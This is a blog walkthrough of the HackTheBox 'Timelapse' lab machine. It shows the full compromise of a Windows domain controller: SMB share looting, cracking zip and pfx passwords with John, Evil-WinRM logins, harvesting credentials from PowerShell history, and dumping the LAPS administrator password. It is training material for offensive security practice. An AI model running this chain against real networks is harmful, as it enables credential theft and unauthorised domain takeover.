Open in app

Sign up

Sign in

Write

Sign up

Sign in

Timelapse from HackTheBox — Detailed Walkthrough

Showing you all the tools and techniques needed to complete the box.

Pencer
InfoSec Write-ups

--

Machine Information

Timelapse from HackTheBox

Timelapse is rated as an easy machine on HackTheBox. This Windows box has many ports open but our time is spent mostly on port 445 with SMB and 5986 with WinRM. With SMBClient we find a couple of open shares, from there we retrieve a backup file. After cracking the zip and then the pfx file within it we use Evil-WinRM to get a remote connection. WinPEAS helps us find a file with credentials. Swapping to that new user we dump a LAPS password for the administrator and complete the box.

Skills required are mostly around enumeration of shares and the Windows file system. Skills learned are converting and cracking different file types, using Evil-WinRM and LAPS.

Initial Recon

As always let’s start with Nmap:

Nmap scan of the box

SMBCLient

It’s a Windows box with port 445 open, let’s have a look for shares:

┌──(root💀kali)-[~/htb/timelapse]
└─# smbclient -L 10.10.11.152
Enter WORKGROUP\roots password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Shares          Disk      
        SYSVOL          Disk      Logon server share

SMBMap

We can see an open share, instead of looking around manually you can use smbmap to list everything we have access to:

smbmap showing list of accessible files

A backup file is usually a good place to look. Let’s grab that winrm zip file:

┌──(root💀kali)-[~/htb/timelapse]
└─# smbclient \\\\10.10.11.152\\Shares
Enter WORKGROUP\roots password: 
smb: \> cd Dev
smb: \Dev\> dir
  winrm_backup.zip          A     2611  Mon Oct 25 16:46:42 2021
            6367231 blocks of size 4096. 1076764 blocks available

smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip
(0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \Dev\> exit

Unfortunately we find it’s a password protected zip file:

┌──(root💀kali)-[~/htb/timelapse]
└─# unzip winrm_backup.zip                               
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
password incorrect--reenter: 
password incorrect--reenter: 
   skipping: legacyy_dev_auth.pfx    incorrect password

Zipfile Hash Cracking

Use the zip2john script to create a hash file we can try and crack:

┌──(root💀kali)-[~/htb/timelapse]
└─# zip2john winrm_backup.zip > winrm.hash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8

┌──(root💀kali)-[~/htb/timelapse]
└─# cat winrm.hash      
winrm_backup.zip/legacyy_dev_auth.pfx:$pkzip$1*1*2*0*965*9fb*12ec568
c88a3cec7243acf179b842f2d96414d306fd67f0bb6abd97366b7aaea736a0<SNIP>
82727976b2243d1d9a4032d625b7e40325220b35bae73a3d11f4e82a4085f9<SNIP>
7b7e506452f76*$/pkzip$:legacyy_dev_auth.pfx:winrm_backup.zip::winrm_backup.zip

Now we can try to crack with JohnTheRipper and the rockyou wordlist:

┌──(root💀kali)-[~/htb/timelapse]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt winrm.hash  
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)     
1g 0:00:00:03 DONE (2022-04-09 22:31) 0.2583g/s 897521p/s 897521c/s 897521C/s surkerior..superkebab
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

It only takes a few seconds to get the password. Let’s unzip the file and look inside:

┌──(root💀kali)-[~/htb/timelapse]
└─# unzip winrm_backup.zip                                  
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 
  inflating: legacyy_dev_auth.pfx

PFX file Hash Cracking

We have a pfx file from the archive. If you’ve not worked with pfx files before, then this is helpful. The last section explains how to extract a private key from a pfx file. However if we try it we find this also needs a password:

┌──(root💀kali)-[~/htb/timelapse]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv.key
Enter Import Password:
Mac verify error: invalid password?

Back to John to crack this one. First convert the pfx file to a John friendly hash:

┌──(root💀kali)-[~/htb/timelapse]
└─# pfx2john legacyy_dev_auth.pfx > pfx.hash

┌──(root💀kali)-[~/htb/timelapse]
└─# cat pfx.hash
legacyy_dev_auth.pfx:$pfxng$1$20$2000$20$eb755568327396de179c4a5d
668ba8fe550ae18a$3082099c3082060f06092a864886f70d010701a082060004
8205fc308205f8308205f4060b2a864886f70d010c0a0102a08204fe308<SNIP>
23b99e245b03465a6ce0c974055e6dcc74f0e893:::::legacyy_dev_auth.pfx

Fire up JohnTheRipper with rockyou again:

┌──(root💀kali)-[~/htb/timelapse]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt pfx.hash      
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for statusthuglegacy       (legacyy_dev_auth.pfx)     1g 0:00:00:42 DONE (2022-04-09 22:45) 0.02346g/s 75826p/s 75826c/s 75826C/s thuglife06..thsco04
Session completed.

We have another password in only a few seconds. Let’s extract that private key now we have the password:

┌──(root💀kali)-[~/htb/timelapse]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv.key
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:

For PEM pass phrase you can set this to anything, I used 1234.

We also need the certificate as well as the private key. Use the same password as we got from John again:

┌──(root💀kali)-[~/htb/timelapse]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pfx.crt
Enter Import Password:

Evil-WinRM As User Legacyy

Now we have all the files needed to connect using Evil-WinRM:

┌──(root💀kali)-[~/htb/timelapse]
└─# evil-winrm -i 10.10.11.152 -c ./pfx.crt -k ./priv.key -p -u -S 
Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents>

User Flag

Using the PEM password 1234 we set before and we’re now connected. I got the user flag first:

*Evil-WinRM* PS C:\Users\legacyy\Documents> type ..\desktop\user.txt
e9fd75b313ffaa4e72f06e32dffc6f96

WinPEAS

Then I used WinPEAS to look for interesting things:

Downloading latest version of winPEAS

We can use our connected session to upload the file:

*Evil-WinRM* PS C:\Users\legacyy\Documents> upload /root/htb/timelapse/winPEAS.bat
Info: Uploading /root/htb/timelapse/winPEAS.bat to C:\Users\legacyy\Documents\winPEAS.bat
Enter PEM pass phrase:
Data: 47688 bytes of 47688 bytes copied
Info: Upload successful!

The bat file runs but the output is a little messy. Even so, looking through we find a number of interesting things:

*Evil-WinRM* PS C:\Users\legacyy\Documents> .\winPEAS.bat

<SNIP>
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft Services\AdmPwd
    AdmPwdEnabled    REG_DWORD    0x1
[i] Active if "1"

<SNIP>
Checking PS history file
 Volume in drive C has no label.
 Volume Serial Number is 22CC-AE66
 Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
03/04/2022  12:46 AM               434 ConsoleHost_history.txt
               1 File(s)            434 bytes
               0 Dir(s)   6,101,368,832 bytes free

The ConsoleHost_history.txt file contains commands run by the user we are connected as:

*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txtwhoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit

It’s one of the many files to check, as noted on the PayloadsAllTheThings cheat-sheet. From that we have a new user svc_deploy and a password. We also see they looked at all the users in AD, a quick check shows there quite a few:

*Evil-WinRM* PS C:\Users\legacyy\Documents> get-aduser -filter * | select samaccountname
Enter PEM pass phrase:

samaccountname
--------------
Administrator
Guest
krbtgt
thecybergeek
payl0ad
legacyy
sinfulz
babywyrm
svc_deploy
TRX

Evil-WinRM As User SVC_Deploy

I can’t do a lot as this current user, lets swap to the svc_deploy account we found:

*Evil-WinRM* PS C:\Users\legacyy\Documents> exit
Enter PEM pass phrase:
Info: Exiting with code 0

┌──(root💀kali)-[~/htb/timelapse]
└─# evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S

Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>

LAPS

I spent a while looking around with nothing obvious jumping out. Looking back at the WinPEAS output we see it found LAPS is installed in the registry. We also saw at the start on the HelpDesk share there were the LAPS installation docs and file. And then the box name makes sense TimeLapse!

LAPS manages the local admin password, rotating it on a set frequency. This is a guide to all things LAPS. I also found this which was helpful, from that I dumped the LAPS password from AD:

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> get-adcomputer -filter * -properties ms-mcs-admpwd | select name,ms-mcs-admpwd

name  ms-mcs-admpwd
----  -------------
DC01  1;s(T[,8/k6k8+n1e8Jh+Q@r
DB01
WEB01
DEV01

Checking which server we are on we find it’s DC01:

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> hostname
dc01

Root Flag

So we have the local administrator password, and we know we’re on the DC01 box that it relates to. Let’s drop out of this shell, and connect as admin:

┌──(root💀kali)-[~/htb/timelapse]
└─# evil-winrm -i 10.10.11.152 -u Administrator -p '1;s(T[,8/k6k8+n1e8Jh+Q@r' -S       

Evil-WinRM shell v3.3
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Let’s grab the root flag to finish the box:

*Evil-WinRM* PS C:\Users> type trx\desktop\root.txt
3b0e8ff4e0ba0e044abaf52dd07d342d

All done. See you next time.

If you liked this article please leave me a clap or two (it’s free!)

Twitter — https://twitter.com/pencer_io
Website — https://pencer.io

Originally published at https://pencer.io on August 22, 2022.

From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 Github Repos and tools, and 1 job alert for FREE!

Ctf
Ctf Writeup
Hacking
Hacker
Hackthebox

--

--

Pencer
InfoSec Write-ups
Follow

Written by Pencer

101 Followers
Writer for

Eat. Sleep. Hack. Repeat. I like hacking. A lot of hacking. Mostly CTFs, but then other stuff too when I get round to it.

Follow

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams